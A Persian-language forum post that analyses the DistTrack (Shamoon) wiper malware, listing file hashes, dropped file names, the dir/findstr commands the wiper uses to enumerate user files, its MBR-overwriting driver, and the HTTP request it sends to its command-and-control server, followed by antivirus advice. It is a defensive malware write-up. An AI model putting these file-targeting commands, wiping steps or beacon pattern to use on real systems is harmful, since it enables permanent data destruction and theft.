• مشکی
  • سفید
  • سبز
  • آبی
  • قرمز
  • نارنجی
  • بنفش
  • طلایی
ارتباطات و فن آوری اطلاعات (بازدید: 184)
پنج شنبه 2/6/1391 - 20:3 -0 تشکر 524937
ویروس DistTrack در کمین است!

برخی کارشناسان امنیتی بدافزار DistTrack را نسخه جدیدی از بدافزاری می‌دانند که در ایران به وایپر مشهور شد و در نهایت منجر به کشف بدافزار فلیم شد.
بدافزار "DistTrack" از نوع بدافزارهای Trojan بوده و رفتار بسیار مخربی دارد. این بدافزار با رونویسی فایلها و بخش MBR و جایگزین کردن داده های آنها با داده های خراب، سبب از بین رفتن دائمی اطلاعات ذخیره شده بر روی دیسک می شود. W۳۲/DistTrack برای اولین بار در مرداد ماه سال جاری (۱۳۹۱) مشاهده شد.

نحوه انتشار اولیه این بدافزار هنوز مشخص نیست اما قابلیت انتشار از طریق Admin$ را دارد.

فایلهای اصلی مورد استفاده بدافزار DistTrack عبارتند از:

Filename : str.exe

Length : ۹۸۹۱۸۴ bytes

MD۵ : B۱۴۲۹۹FD۴D۱CBFB۴CC۷۴۸۶D۹۷۸۳۹۸۲۱۴

SHA۱ : ۷C۰DC۶A۸F۴D۲D۷۶۲A۰۷A۵۲۳F۱۹B۷ACD۲۲۵۸F۷ECC

Filename : str.exe

Length : ۹۸۹,۱۸۴ bytes

MD۵ : D۲۱۴C۷۱۷A۳۵۷FE۳A۴۵۵۶۱۰B۱۹۷C۳۹۰AA

SHA۱: ۵۰۲۹۲۰A۹۷E۰۱C۲D۰۲۲AC۴۰۱۶۰۱A۳۱۱۸۱۸F۳۳۶۵۴۲

This version does run however and results in the following files being dropped on the system.

Filename : netinit.exe

Length : ۱۳۳۱۲۰ bytes

MD۵ : ۴۱F۱۳۸۱۱FA۲D۴C۴۱B۸۰۰۲BFB۲۵۵۴A۲۸۶

SHA۱ : C۴۰۴CDC۹F۸۰۴B۵۶۵D۶۰B۲ADB۸۷C۹A۶B۷AFB۴۲B۹۰

Filename : dfrag.exe

Length : ۱۹۴۰۴۸ bytes

MD۵ : ۳B۷۴۰CCA۴۰۱۷۱۵۹۸۵F۳A۰C۲۸F۸۵۱B۶۰E

SHA۱ : ۵۷۵۲۸۹۸ABC۸۵۵۲۸D۵۰۷۳۹A۱EDC۸E۶FEED۰A۳E۱AD

Filename : drdisk.sys

Length : ۲۷۲۸۰ bytes

MD۵ : ۱۴۹۳D۳۴۲E۷A۳۶۵۵۳C۵۶B۲ADEA۱۵۰۹۴۹E

SHA۱ : CE۵۴۹۷۱۴A۱۱BD۴۳B۵۲BE۷۰۹۵۸۱C۶E۱۴۴۹۵۷۱۳۶EC

ظاهراً فایلهای اجرایی این بدافزار در ۱۹ مرداد ایجاد شده اند.

با اجرا شدن فایل اجرایی اولیه، بدافزار یک کپی از خود را با نام tsksvr.exe در مسیر SystemRoot\System۳۲ قرار می دهد. در ادامه، این فایل تحت یک سرویس با مشخصاتی که در شکل زیر نمایش داده شده است اجرا و فایل اولیه حذف می شود.

بدافزار DistTrack
با شروع به کار سرویس ایجاد شده، هر دو دقیقه یکبار یک فایل اجرایی با یکی از نامهای زیر بر روی سیستم قربانی کپی می شود:

caclsrv.exe, certutl.exe, clean.exe, ctrl.exe, dfrag.exe, dnslookup.exe, dvdquery.exe, event.exe, findfile.exe, gpget.exe, ipsecure.exe, iissrv.exe, msinit.exe, ntfrsutil.exe, ntdsutl.exe, power.exe, rdsadmin.exe, regsys.exe, sigver.exe, routeman.exe, rrasrv.exe, sacses.exe, sfmsc.exe, smbinit.exe, wcscript.exe, ntnw.exe, netx.exe, fsutl.exe, extract.exe,

همچنین این ویروس دارای یک بخش Wiper است که وظیفه رونویسی فایلهای دیسک سخت، MBR و Boot Sector را عهده دار است. این بخش فرامین زیر را اجرا می کند:

dir "C:\Documents and Settings\” /s /b /a:-D >nul | findstr -i download >nul >f۱.inf

dir "C:\Documents and Settings\” /s /b /a:-D >nul | findstr -i document >nul >>f۱.inf

dir C:\Users\ /s /b /a:-D >nul | findstr -i download >nul >>f۱.inf

dir C:\Users\ /s /b /a:-D >nul | findstr -i document >nul >>f۱.inf

dir C:\Users\ /s /b /a:-D >nul | findstr -i picture >nul >>f۱.inf

dir C:\Users\ /s /b /a:-D >nul | findstr -i video >nul >>f۱.inf

dir C:\Users\ /s /b /a:-D >nul | findstr -i music >nul >>f۱.inf

dir "C:\Documents and Settings\” /s /b /a:-D >nul | findstr -i desktop >nul >f۲.inf

dir C:\Users\ /s /b /a:-D >nul | findstr -i desktop >nul >>f۲.inf

dir C:\Windows\System۳۲\Drivers /s /b /a:-D >nul >>f۲.inf

dir C:\Windows\System۳۲\Config /s /b /a:-D >nul | findstr -v -i systemprofile >nul >>f۲.inf

dir f۱.inf /s /b >nul >>f۱.inf

dir f۲.inf /s /b >nul >>f۱.inf

نتیجه اجرای این فرامین، تهیه فهرستی از نام و مسیر فایلهایی است که در شاخه های Desktop، Documents، Download، Video، Music، Pictures قرار دارند. این فهرست در دو فایل به نامهای f۱.inf و f۲.inf ذخیره می شوند. در ادامه، یک کپی از فهرست فایلها در فایل زیر ذخیره می شود:
C:\WINDOWS\inf\netfb۳۱۸.pnf

سپس داده های این فایلها، با ۱۰۲۴ بایت اول یک فایل JPEG به طور مکرر جایگزین می شود. در این حالت، محتوای اصلی فایلها از بین رفته و غیرقابل برگشت می شوند.

همچنین بخش Wiper فایلی با نام drdisk.sys را بر روی سیستم آلوده کپی می کند که از آن برای رونویسی MBR و جداول پارتیشن دیسک استفاده می کند. داده هایی که برای رونویسی استفاده می شوند همانهایی هستند که در تصویر بالا نمایش داده شده است. این رونویسی سبب می شود که دیسک بعد از راه اندازی مجدد دستگاه به وسیله سیستم غیرقابل شناسایی شود.

در نهایت این بدافزار فهرستی از فایلهای رونویسی شده را از C:\WINDOWS\inf\netfb۳۱۸.pnf خوانده و اطلاعات را به مرکز فرماندهی (Command and Control) خود با مشخصات زیر ارسال می کند:

GET /ajax_modal/modal/data.asp?mydata=_۱CD&uid=۱۷۲.xxx.xxx.xxx&state=۹۳۲۳۸۵۹

HTTP/۱.۱

Connection: keep-alive

User-Agent: you

Host: ۱۰.۱.۲۵۲.۱۹

Pragma: no-cache

به روز نگه داشتن ضدویروس و همچنین استفاده از تنظیمات توصیه شده به وسیله کارشناسان (مانند فعال سازی قاعده Prevent remote creation/modification of executable and configuration files) در نرم افزار ضدویروس می تواند کامپیوتر را در مقابل این ویروس محافظت کند.

بدافزار DistTrack که اکنون به وسیله برخی شرکتهای ضدویروس "Shamoon" هم نامیده می شود، به احتمال قوی از طریق ایمیل و به صورت یک برنامه اجرایی مخفی شده در درون فایل پیوست (attachemnt) ایمیل، منتشر می شود. به نظر می رسد که این برنامه اجرایی از یک نقطه ضعف ناشناخته برای نفوذ به سیستم قربانی سوءاستفاده می کند.

با توجه به آمار آلودگی های گزارش شده، برخی شرکتهای ضدویروس اعتقاد دارند که هدف اصلی بدافزار DistTrack حوزه انرژی (نفت و گاز) است. از جمله، شرکت نفت عریستان سعودی (Aramco) مورد حمله این بدافزار قرار گرفته و طبق برخی اخبار غیرموثق، بخش های بزرگی از این شرکت نفتی دچار اختلال شده است و علاوه بر کامپیوتر پرسنل، سرورهای ایمیل و وب و همچنین Domain Controller مورد حمله و آسیب قرار گرفته اند.

برخی کارشناسان امنیتی این بدافزار را نسخه جدیدی از بدافزاری می دانند که در ایران به Wiper مشهور شد و در نهایت منجر به کشف بدافزار Flame شد. از طرف دیگر، برخی اعتقاد دارند که بدافزار DistTrack یک بدافزار جدید و مستقل است که در ساخت آن فقط از Wiper الهام گرفته شده است.


آمریکا هیچ غلطی نمی تواند بکند.
اسلام پیروزاست.
برو به انجمن
فعالترین ها در هفته گذشته
انجمن فعال در هفته گذشته
مدیر فعال در هفته گذشته
آخرین مطالب
  • آلبوم تصاویر بازدید از کلیسای جلفای...
    آلبوم تصاویر بازدید اعضای انجمن نصف جهان از کلیسای جلفای اصفهان.
  • بازدید از زیباترین کلیسای جلفای اصفهان
    جمعی از کاربران انجمن نصف جهان، در روز 27 مردادماه با همکاری دفتر تبیان اصفهان، بازدیدی را از کلیسای وانک، به عمل آورده‌اند. این کلیسا، یکی از کلیساهای تاریخی اصفهان به شمار می‌رود.
  • اعضای انجمن در خانه شهید بهشتی
    خانه پدری آیت الله دکتر بهشتی در اصفهان، امروزه به نام موزه و خانه فرهنگ شهید نام‌گذاری شده است. اعضای انجمن نصف جهان، در بازدید دیگر خود، قدم به خانه شهید بهشتی گذاشته‌اند.
  • اطلاعیه برندگان جشنواره انجمن‌ها
    پس از دو ماه رقابت فشرده بین کاربران فعال انجمن‌ها، جشنواره تابستان 92 با برگزاری 5 مسابقه متنوع در تاریخ 15 مهرماه به پایان رسید و هم‌اینک، زمان اعلام برندگان نهایی این مسابقات فرارسیده است.
  • نصف جهانی‌ها در مقبره علامه مجلسی
    اعضای انجمن نصف جهان، در یك گردهمایی دیگر، از آرامگاه علامه مجلسی و میدان احیا شده‌ی امام علی (ع) اصفهان، بازدیدی را به عمل آوردند.